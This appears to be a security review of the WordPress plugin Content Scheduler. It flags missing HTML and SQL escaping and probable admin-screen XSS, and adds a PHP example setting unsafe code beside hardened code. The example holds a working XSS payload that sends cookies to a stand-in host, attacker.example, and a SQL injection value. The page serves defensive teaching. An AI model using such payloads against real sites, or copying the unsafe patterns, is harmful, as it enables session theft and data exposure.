Plugin inspection:

Content Scheduler

Potentially unsafe

Last revised:

Confidence: Medium
This plugin has been given a short, targeted code review.

Before using this plugin, you should very carefully consider its potential problems and should conduct a thorough assessment. Read more about this recommendation.

Warnings

This recommendation applies to version 1.0.0 of this plugin, but the most recent version is 2.0.5. These findings may no longer be correct.

Findings

This plugin is poorly written. Among the issues identified are:

  • No SQL escaping (but it does not immediately appear exploitable).
  • No escaping of HTML output, so it is likely vulnerable to XSS attacks.
  • Produces many PHP notices during normal operation.
  • Code is idiosyncratic in places. Sometimes uses include() where a function would be more appropriate (see line 555 of content-scheduler.php for an instance of this).

We are confident more problems would be found on a deeper inspection of the code.

Reason for the 'Potentially unsafe' result

The plugin contains or is likely to contain a vulnerability which could be exploited by an end user and which would compromise the site’s confidentiality, integrity or availability:

Probable XSS in the plugin's admin screens, which an editor or author could use to run script in an administrator's browser and hijack that session.
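To make the two findings concrete (no HTML escaping of output, no SQL escaping, and why the first is the one that earns the 'Potentially unsafe' result), here is an added example that is not code from the Content Scheduler plugin. It shows each vulnerable pattern beside its hardened form in plain PHP so it runs stand-alone with the PHP CLI and the sqlite PDO driver; the table, column names, the scheduled-post title and the tampered query-string value are all constructed for illustration. In a real WordPress plugin the escapers would be esc_attr() and esc_html() and the prepared query would go through $wpdb->prepare(); the plain-PHP equivalents below stand in for them only to keep the example runnable outside WordPress.

```php
<?php
// Added example (not the plugin's own code): the unsafe patterns the review
// describes, next to their hardened forms. Everything below is constructed.

// Constructed input: a post title as an author-level user could enter it.
// The plugin later renders it on an admin screen without escaping.
$authorTitle = 'Launch post"><script>fetch("https://attacker.example/?c="+document.cookie)</script>';

// --- Finding: no HTML escaping -------------------------------------------
// Vulnerable: the title is interpolated raw into both an attribute and text.
// The payload closes the value="..." attribute and runs in the admin's browser,
// which is the editor/author -> administrator session hijack the review warns about.
function render_row_unsafe(string $title): string {
    return '<tr><td><input type="text" value="' . $title . '"></td>'
         . '<td>' . $title . '</td></tr>';
}

// Hardened: escape at the point of output, choosing the escaper for the context.
// (Plain-PHP stand-ins for WordPress's esc_attr() / esc_html(); assumption, not plugin code.)
function esc_attr_like(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
function esc_html_like(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
function render_row_safe(string $title): string {
    return '<tr><td><input type="text" value="' . esc_attr_like($title) . '"></td>'
         . '<td>' . esc_html_like($title) . '</td></tr>';
}

// --- Finding: no SQL escaping --------------------------------------------
// Constructed schedule table in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE schedule (post_id INTEGER, post_title TEXT, run_at TEXT)');
$db->exec("INSERT INTO schedule VALUES (1, 'Hello', '2020-01-01 00:00:00'),
                                       (2, 'World', '2020-01-02 00:00:00')");

// Vulnerable: a request parameter is pasted into the query text, so a value
// such as "1 OR 1=1" rewrites the predicate instead of being compared as a value.
function find_by_id_unsafe(PDO $db, string $postId): array {
    $sql = "SELECT post_id, post_title FROM schedule WHERE post_id = $postId";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: bind the value as a parameter; the query text never changes.
// (In WordPress the equivalent is $wpdb->prepare() with %d / %s placeholders.)
function find_by_id_safe(PDO $db, string $postId): array {
    $stmt = $db->prepare('SELECT post_id, post_title FROM schedule WHERE post_id = ?');
    $stmt->execute([$postId]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker-controlled query-string value.
$tampered = '1 OR 1=1';

echo "unsafe HTML: " . render_row_unsafe($authorTitle) . "\n";
echo "safe HTML:   " . render_row_safe($authorTitle) . "\n";
// The unsafe query returns every row because the WHERE clause was rewritten;
// the bound query treats the whole string as one value and matches nothing.
echo "unsafe SQL rows: " . count(find_by_id_unsafe($db, $tampered)) . "\n";
echo "safe SQL rows:   " . count(find_by_id_safe($db, $tampered)) . "\n";
```

When reviewing a plugin for these two patterns, the quick check is a grep for output statements (echo, print, printf) whose arguments are variables not wrapped in an esc_* function, and for $wpdb->query(), get_results(), get_var() or get_row() calls whose SQL string contains an interpolated variable without a surrounding $wpdb->prepare(). Each hit is a candidate for the findings above and needs the same question asked of it: who controls the value, and in whose browser or query does it land?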

Failure criteria

  • Lack of input sanitisation
  • Execution of unprepared SQL statements
  • Lack of proper output escaping

Read more about our failure criteria.